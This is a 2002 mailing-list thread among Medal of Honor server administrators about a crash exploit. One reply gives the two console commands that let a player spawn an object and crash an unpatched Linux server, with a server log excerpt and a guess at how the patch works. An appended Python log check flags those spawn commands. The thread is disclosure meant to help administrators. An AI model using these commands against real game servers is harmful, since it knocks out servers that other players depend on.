[mohaa] Linux spawn fix?

[-SF-]Shockwave shockwave at clanshortfuse.com
Fri Dec 6 18:36:57 EST 2002


Hello guys,

I know the details surrounding this problem.  I agree with Hazzie that it is
important for administrators to know what causes problems like this for the
same reasons he mentions.  The fix that is out there works, so a patched
server is immune to the attack I am about to outline.

The exploit is caused by the game engine allowing a player to spawn a new
object in the level.  By enabling the console, a player can type two
commands and cause the server to crash.  Here's one method that was
successfully used on my server before I patched it:

(1) Open the game console
(2) Type:  pushmenu lod_tool
(3) Type: lod_spawn models/vehicles/uboat.tik

Here is an excerpt from my server log from the attack I just mentioned:

clientCommand: WAFFEN-SS-16Th-THUG : 47 : lod spawn models/vehicles/uboat.tik
Cvar Set2: lod tikiname models/vehicles/uboat.tik
Cvar Set2: lod tool 1
^~^~^ Add the following line to the * precache.scr map script:
cache models/vehicles/uboat.tik
TIKI InitTiki: could not find surface 'material4' in 'models/vehicles/uboat.tik' (check referenced skb/skd files).
Cvar Set2: cg drawviewmodel 0
Cvar Set2: cg shadows 0
clientCommand: WAFFEN-SS-16Th-THUG : 48 : vÅ
client text ignored for WAFFEN-SS-16Th-THUG
WARNING: bad command byte for client 4
WARNING: bad command byte for client 4
WARNING: bad command byte for client 4
clientCommand: -=WB=- T-Dog : 1 : disconnect
broadcast: print " -=WB=- T-Dog disconnected\n"
Going to CS ZOMBIE for -=WB=- T-Dog

The patch works by obfuscating the commands used by players to spawn the
entities.  I'm not exactly sure how the patch actually works, but I believe
that it replaces the command references in the binary file fgameded.so with
random characters.  This keeps a malicious player from being able to access
these functions because there is no way to implement this exploit short of
guessing the altered command name.  I hope this helps make this issue
clearer for everyone.

The entire situation makes me wonder.  Why would a game company allow
functionality like this to be accessed in a multiplayer setting from a
client in the first place?  I still can't believe that they actually allow
players to join a multiplayer game with cheats enabled!  This is how some of
the wall hacks and other cheats are implemented.  If anyone had stopped to
think and take advantage of the data gathered by dealing with cheaters in
other online games over the years, things like this would never be issues.
Hindsight may be 20/20, but a person actually has to look to get a clue.
Unfortunately, it appears that some people are still asleep at the switch.


Shockwave


----- Original Message -----
From: <richardnharrison at btinternet.com>
To: <mohaa at icculus.org>
Sent: Friday, December 06, 2002 5:53 AM
Subject: Re: [mohaa] Linux spawn fix?


> Unless you know someone who knows the bug you're very unlikely to find out on
> such a list as this. People usually don't pass on these sorts of bugs/cheats
> on these lists. In my humble opinion they should be passed on. If they are
> widely known about then people responsible for the game have more reason to
> fix it. Sort of like security updates with OS's. The incentive being who
> wants to play a game where the majority cheat. The downside being that the
> few (and I am sure the minority rather than the majority get their kicks out
> of cheating) would cause pain for some servers.
>
> Hazzie.
>
> >  from:    "Eduardo E. Silva" <esilva at silvex.com>
> >  date:    Fri, 06 Dec 2002 04:25:38
> >  to:      mohaa at icculus.org
> >  subject: Re: [mohaa] Linux spawn fix?
> >
> > How is that possible? I've already applied this to my server. My question is
> > how did they do that?
> >
> > Ed Silva
> > Silvex Consulting Inc.
> > (714) 504-6870 Cell
> >
> > Salsich, Luke said:
> > > hey all,
> > >
> > > I remember seeing a post a while back about a Linux fix for the issue of
> > > users spawning objects into the map and crashing the server. Unfortunately,
> > > I can't locate that fix on the net. Anybody have a link to the Linux version
> > > of the fix?
> > >
> > > Thanks!
> > >
> > > Luke Salsich
> > >
> > >
> > >
> > >
> >
> >
> >
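
A log check built on the server log excerpt in the message above, added here as an example; it is not part of the original thread or of the patch. It flags clientCommand lines carrying the lod_spawn command and counts the "bad command byte" warnings that follow. The function name, the regular expressions and the sample log are constructed for illustration.

```python
import re

# Constructed sample, modelled on the log excerpt in the message above
# (wrapped lines rejoined; the first line is an invented benign command).
SAMPLE_LOG = """\
clientCommand: PlayerA : 12 : say hello
clientCommand: WAFFEN-SS-16Th-THUG : 47 : lod spawn models/vehicles/uboat.tik
Cvar Set2: lod tikiname models/vehicles/uboat.tik
TIKI InitTiki: could not find surface 'material4' in 'models/vehicles/uboat.tik'
WARNING: bad command byte for client 4
WARNING: bad command byte for client 4
clientCommand: -=WB=- T-Dog : 1 : disconnect
"""

# "clientCommand: <player> : <sequence> : <command text>" as seen in the excerpt.
# Player names may contain spaces and punctuation, so anchor on " : <digits> : ".
CLIENT_CMD = re.compile(r"^clientCommand: (?P<player>.+?) : (?P<seq>\d+) : (?P<cmd>.*)$")
# The excerpt shows "lod spawn"; the console command is typed "lod_spawn". Match both.
SPAWN_CMD = re.compile(r"^lod[ _]spawn\b\s*(?P<model>\S*)", re.IGNORECASE)
BAD_BYTE = re.compile(r"^WARNING: bad command byte for client (?P<slot>\d+)$")

def find_spawn_attempts(log_text):
    """Return one dict per lod_spawn client command, with later parser warnings counted."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        line = line.rstrip()
        m = CLIENT_CMD.match(line)
        if m:
            spawn = SPAWN_CMD.match(m.group("cmd"))
            if spawn:
                findings.append({"line": lineno, "player": m.group("player"),
                                 "model": spawn.group("model"), "bad_command_bytes": 0})
            continue
        # Attribute later "bad command byte" warnings to the most recent attempt.
        if findings and BAD_BYTE.match(line):
            findings[-1]["bad_command_bytes"] += 1
    return findings

if __name__ == "__main__":
    for f in find_spawn_attempts(SAMPLE_LOG):
        print(f"line {f['line']}: {f['player']} issued lod_spawn {f['model']} "
              f"({f['bad_command_bytes']} bad-command-byte warnings followed)")
```

On a patched server the same check still shows which clients are trying the original command name.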




